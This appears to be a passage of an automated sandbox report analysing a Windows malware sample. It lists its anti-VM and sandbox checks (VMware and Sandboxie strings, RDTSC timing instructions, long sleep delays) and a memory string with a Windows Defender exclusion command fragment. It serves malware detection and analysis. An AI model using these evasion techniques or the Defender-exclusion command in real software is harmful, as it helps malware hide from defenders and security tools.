          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.HkE0tD0g4NXKJfy.exe.317b220.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HkE0tD0g4NXKJfy.exe.30e8edc.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: HkE0tD0g4NXKJfy.exe PID: 5624, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002D08604 second address: 0000000002D0860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002D0899E second address: 0000000002D089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 6916Thread sleep count: 576 > 30Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239841s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 6916Thread sleep count: 2157 > 30Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 6132Thread sleep time: -30220s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239718s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239610s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239499s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239391s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239266s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -239094s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238968s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238844s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238733s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238609s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238390s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -238157s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -237547s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -237110s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -236750s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 5756Thread sleep time: -236641s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe TID: 4676Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6524Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_004088D0 rdtsc 7_2_004088D0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239841Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239718Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239610Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239499Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239391Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239266Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239094Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238968Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238844Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238733Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238609Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238500Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238390Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238157Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 237547Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 237110Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 236750Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 236641Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeWindow / User API: threadDelayed 576Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeWindow / User API: threadDelayed 2157Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239841Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 30220Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239718Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239610Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239499Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239391Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239266Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 239094Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238968Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238844Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238733Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238609Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238500Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238390Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 238157Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 237547Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 237110Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 236750Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 236641Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: msdt.exe, 0000000D.00000002.550902230.0000000000487000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWa Connection* 4
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000A.00000000.300728324.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000A.00000000.320269745.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 0000000A.00000000.300728324.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 0000000A.00000000.297282271.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.297282271.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 0000000A.00000000.323358278.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yb3d8bb
          Source: msdt.exe, 0000000D.00000002.550902230.0000000000487000.00000004.00000020.sdmp, msdt.exe, 0000000D.00000002.550615461.0000000000453000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000000A.00000000.300728324.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_004088D0 rdtsc 7_2_004088D0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912990 mov eax, dword ptr fs:[00000030h]7_2_01912990
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190C182 mov eax, dword ptr fs:[00000030h]7_2_0190C182
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A185 mov eax, dword ptr fs:[00000030h]7_2_0191A185
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019651BE mov eax, dword ptr fs:[00000030h]7_2_019651BE
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019651BE mov eax, dword ptr fs:[00000030h]7_2_019651BE
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019651BE mov eax, dword ptr fs:[00000030h]7_2_019651BE
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019651BE mov eax, dword ptr fs:[00000030h]7_2_019651BE
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019669A6 mov eax, dword ptr fs:[00000030h]7_2_019669A6
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019161A0 mov eax, dword ptr fs:[00000030h]7_2_019161A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019161A0 mov eax, dword ptr fs:[00000030h]7_2_019161A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EB1E1 mov eax, dword ptr fs:[00000030h]7_2_018EB1E1
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EB1E1 mov eax, dword ptr fs:[00000030h]7_2_018EB1E1
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EB1E1 mov eax, dword ptr fs:[00000030h]7_2_018EB1E1
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019741E8 mov eax, dword ptr fs:[00000030h]7_2_019741E8
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9100 mov eax, dword ptr fs:[00000030h]7_2_018E9100
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9100 mov eax, dword ptr fs:[00000030h]7_2_018E9100
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9100 mov eax, dword ptr fs:[00000030h]7_2_018E9100
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191513A mov eax, dword ptr fs:[00000030h]7_2_0191513A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191513A mov eax, dword ptr fs:[00000030h]7_2_0191513A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01904120 mov eax, dword ptr fs:[00000030h]7_2_01904120
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01904120 mov eax, dword ptr fs:[00000030h]7_2_01904120
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01904120 mov eax, dword ptr fs:[00000030h]7_2_01904120
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01904120 mov eax, dword ptr fs:[00000030h]7_2_01904120
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01904120 mov ecx, dword ptr fs:[00000030h]7_2_01904120
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190B944 mov eax, dword ptr fs:[00000030h]7_2_0190B944
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190B944 mov eax, dword ptr fs:[00000030h]7_2_0190B944
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EC962 mov eax, dword ptr fs:[00000030h]7_2_018EC962
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EB171 mov eax, dword ptr fs:[00000030h]7_2_018EB171
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EB171 mov eax, dword ptr fs:[00000030h]7_2_018EB171
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9080 mov eax, dword ptr fs:[00000030h]7_2_018E9080
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01963884 mov eax, dword ptr fs:[00000030h]7_2_01963884
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01963884 mov eax, dword ptr fs:[00000030h]7_2_01963884
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191F0BF mov ecx, dword ptr fs:[00000030h]7_2_0191F0BF
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191F0BF mov eax, dword ptr fs:[00000030h]7_2_0191F0BF
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191F0BF mov eax, dword ptr fs:[00000030h]7_2_0191F0BF
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]7_2_019120A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]7_2_019120A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]7_2_019120A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]7_2_019120A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]7_2_019120A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A0 mov eax, dword ptr fs:[00000030h]7_2_019120A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019290AF mov eax, dword ptr fs:[00000030h]7_2_019290AF
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]7_2_0197B8D0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0197B8D0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]7_2_0197B8D0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]7_2_0197B8D0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]7_2_0197B8D0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197B8D0 mov eax, dword ptr fs:[00000030h]7_2_0197B8D0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E58EC mov eax, dword ptr fs:[00000030h]7_2_018E58EC
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967016 mov eax, dword ptr fs:[00000030h]7_2_01967016
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967016 mov eax, dword ptr fs:[00000030h]7_2_01967016
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967016 mov eax, dword ptr fs:[00000030h]7_2_01967016
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B4015 mov eax, dword ptr fs:[00000030h]7_2_019B4015
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B4015 mov eax, dword ptr fs:[00000030h]7_2_019B4015
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FB02A mov eax, dword ptr fs:[00000030h]7_2_018FB02A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FB02A mov eax, dword ptr fs:[00000030h]7_2_018FB02A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FB02A mov eax, dword ptr fs:[00000030h]7_2_018FB02A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FB02A mov eax, dword ptr fs:[00000030h]7_2_018FB02A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]7_2_0191002D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]7_2_0191002D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]7_2_0191002D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]7_2_0191002D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191002D mov eax, dword ptr fs:[00000030h]7_2_0191002D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01900050 mov eax, dword ptr fs:[00000030h]7_2_01900050
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01900050 mov eax, dword ptr fs:[00000030h]7_2_01900050
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A2073 mov eax, dword ptr fs:[00000030h]7_2_019A2073
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B1074 mov eax, dword ptr fs:[00000030h]7_2_019B1074
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F1B8F mov eax, dword ptr fs:[00000030h]7_2_018F1B8F
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F1B8F mov eax, dword ptr fs:[00000030h]7_2_018F1B8F
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191B390 mov eax, dword ptr fs:[00000030h]7_2_0191B390
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912397 mov eax, dword ptr fs:[00000030h]7_2_01912397
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A138A mov eax, dword ptr fs:[00000030h]7_2_019A138A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0199D380 mov ecx, dword ptr fs:[00000030h]7_2_0199D380
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01914BAD mov eax, dword ptr fs:[00000030h]7_2_01914BAD
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01914BAD mov eax, dword ptr fs:[00000030h]7_2_01914BAD
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01914BAD mov eax, dword ptr fs:[00000030h]7_2_01914BAD
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B5BA5 mov eax, dword ptr fs:[00000030h]7_2_019B5BA5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019653CA mov eax, dword ptr fs:[00000030h]7_2_019653CA
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019653CA mov eax, dword ptr fs:[00000030h]7_2_019653CA
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]7_2_019103E2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]7_2_019103E2
